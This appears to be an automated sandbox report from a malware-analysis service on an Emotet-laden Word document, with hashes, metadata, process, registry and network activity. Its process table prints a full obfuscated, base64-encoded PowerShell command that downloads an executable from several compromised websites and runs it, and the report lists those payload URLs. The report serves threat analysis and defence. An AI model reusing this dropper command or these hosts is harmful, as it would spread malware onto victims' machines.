| File name: | DATA-588316-H438987.doc |
| Full analysis: | https://app.any.run/tasks/7d11580d-60fe-40c1-8cbe-7e098e743e7c |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | May 20, 2019, 16:23:47 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: modular, Subject: salmon, Author: Gardner Stracke, Comments: Borders Investment Account, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 17 11:00:00 2019, Last Saved Time/Date: Fri May 17 11:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 171, Security: 0 |
| MD5: | 1EB1ACB374D638A0C0212F395179A690 |
| SHA1: | E70ADC1D8A9C09239CCCB7BD5D275F24063AA04F |
| SHA256: | 9F36D3B724B46FA352CA56E371FD3322F7FEA335FE59A71C36A046FB29C034CC |
| SSDEEP: | 3072:5+77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qEPmUzo2ZUisJDC:5+77HUUUUUUUUUUUUUUUUUUUT52VvPmI |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| CompObjUserTypeLen: | 32 |
|---|---|
| CompObjUserType: | Microsoft Word 97-2003 Document |
| Title: | modular |
| Subject: | salmon |
| Author: | Gardner Stracke |
| Keywords: | - |
| Comments: | Borders Investment Account |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2019:05:17 10:00:00 |
| ModifyDate: | 2019:05:17 10:00:00 |
| Pages: | 1 |
| Words: | 30 |
| Characters: | 171 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | Rowe Inc |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 200 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| Manager: | Yost |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2856 | PowErsHell -enC JABvADEANQBfADYANgAyAD0AJwB0ADYANwAwADQAMgA0ACcAOwAkAEwAMAA1ADMAMAA1ADIAXwAgAD0AIAAnADQAMQA1ACcAOwAkAHcANgAxADEAMwA4AD0AJwBRADMANQBfADEAOAAnADsAJABPADQAMwA5AF8AXwA0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMADAANQAzADAANQAyAF8AKwAnAC4AZQB4AGUAJwA7ACQAagAwADQAOQA0ADkANQA9ACcAWQA4ADEAMQAxADcAXwAnADsAJAB3ADYAMwA1ADgAOQA3AD0AJgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGAARQB0AC4AVwBFAGIAYwBMAGkAZQBgAE4AdAA7ACQAegAwADYANQA1ADMAMAA9ACcAaAB0AHQAcAA6AC8ALwBuAGUAdwBzAG8AbgBlAC4AegBhAHAAYgB1AGkAbABkAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBpAG0AYQBnAGUAcwAvAGIAVQBFAEsAbgB4AHgAUABQAFcALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAHIAYQB5AGEAaABlAHIAYgAuAGMAbwBtAC8AcwByAHAAbQAvAGYAcwBqAEEAdwBDAEgAbwBFAC8AQABoAHQAdABwADoALwAvAG0AaQBhAG0AaQBiAGUAYQBjAGgAcAByAGkAdgBhAHQAZQBpAG4AdgBlAHMAdABpAGcAYQB0AG8AcgBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBPAE8ASwBxAEwAUQBKAGoASwAvAEAAaAB0AHQAcAA6AC8ALwBuAG8AYgBlAGwAZgBvAG8AZABzAC4AbQB4AC8AYgBvAG8AdABzAHQAcgBhAHAALwBaAEcAQQBmAHAAQQBRAEcAUgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAeABzAGUAbABpAHMALgBjAG8AbQAvAHcAcAAvAHAANgBhAHQAdwBzAGgAMgA4AF8AegBiADMAawBhADIAbgBpAGEANQAtADQAOAAwADQANAA5AC8AJwAuAHMAcABsAEkAdAAoACcAQAAnACkAOwAkAEYAMgA4AF8AMgA0ADIANQA9ACcASABfADYAMAAwADkANgAnADsAZgBvAHIAZQBhAGMAaAAoACQAYwAxADkAMQBfADgANwAgAGkAbgAgACQAegAwADYANQA1ADMAMAApAHsAdAByAHkAewAkAHcANgAzADUAOAA5ADcALgBkAE8AdwBuAGwATwBBAGQAZgBpAGwAZQAoACQAYwAxADkAMQBfADgANwAsACAAJABPADQAMwA5AF8AXwA0ACkAOwAkAGMAMAAyADIANAA3AD0AJwBSADEAMwA4ADYAMgAzADcAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABPADQAMwA5AF8AXwA0ACkALgBMAEUATgBHAHQAaAAgAC0AZwBlACAAMwA3ADUAOAAzACkAIAB7AC4AKAAnAEkAbgB2AG8AawAnACsAJwBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAE8ANAAzADkAXwBfADQAOwAkAGkAMQA3AF8AXwAyADcANgA9ACcASAAzADYAMgAwADQAXwBfACcAOwBiAHIAZQBhAGsAOwAkAFEANQA0ADAANAA3ADgAPQAnAFAANABfAF8AMAA5ADEAXwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADkAMgA5ADMAMwA9ACcAYwA3ADkAMwA3ADAANQA0ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3368 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DATA-588316-H438987.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | fe> |
Value: 66653E00280D0000010000000000000000000000 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1320419358 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1320419472 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1320419473 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 280D000074B73374280FD50100000000 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | <g> |
Value: 3C673E00280D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | <g> |
Value: 3C673E00280D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3368) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF5D6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2856 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARBX2R3GD5ALRGRIX7A6.temp | — | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$TA-588316-H438987.doc | pgc | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35F1A781.wmf | wmf | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4A39E65.wmf | wmf | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5484922.wmf | wmf | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FDB42F4.wmf | wmf | |
MD5:— | SHA256:— | |||
| 3368 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D15E0CFF.wmf | wmf | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2856 | PowErsHell.exe | GET | 404 | 192.138.19.10:80 | http://www.exselis.com/wp/p6atwsh28_zb3ka2nia5-480449/ | US | xml | 345 b | unknown |
2856 | PowErsHell.exe | GET | 404 | 202.164.44.244:80 | http://newsone.zapbuild.com/wp-admin/images/bUEKnxxPPW/ | IN | xml | 345 b | suspicious |
2856 | PowErsHell.exe | GET | 404 | 207.148.70.171:80 | http://www.arayaherb.com/srpm/fsjAwCHoE/ | CA | xml | 345 b | suspicious |
2856 | PowErsHell.exe | GET | 404 | 184.106.55.126:80 | http://miamibeachprivateinvestigators.com/wp-includes/OOKqLQJjK/ | US | xml | 345 b | malicious |
2856 | PowErsHell.exe | GET | 404 | 208.75.151.24:80 | http://nobelfoods.mx/bootstrap/ZGAfpAQGR/ | US | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2856 | PowErsHell.exe | 202.164.44.244:80 | newsone.zapbuild.com | Quadrant Televentures Limited | IN | suspicious |
2856 | PowErsHell.exe | 207.148.70.171:80 | www.arayaherb.com | SSI Micro Ltd. | CA | suspicious |
2856 | PowErsHell.exe | 184.106.55.126:80 | miamibeachprivateinvestigators.com | Liquid Web, L.L.C | US | malicious |
2856 | PowErsHell.exe | 208.75.151.24:80 | nobelfoods.mx | Liquid Web, L.L.C | US | unknown |
2856 | PowErsHell.exe | 192.138.19.10:80 | www.exselis.com | Liquid Web, L.L.C | US | unknown |
Domain | IP | Reputation |
|---|---|---|
newsone.zapbuild.com |
| suspicious |
www.arayaherb.com |
| suspicious |
miamibeachprivateinvestigators.com |
| malicious |
nobelfoods.mx |
| unknown |
www.exselis.com |
| unknown |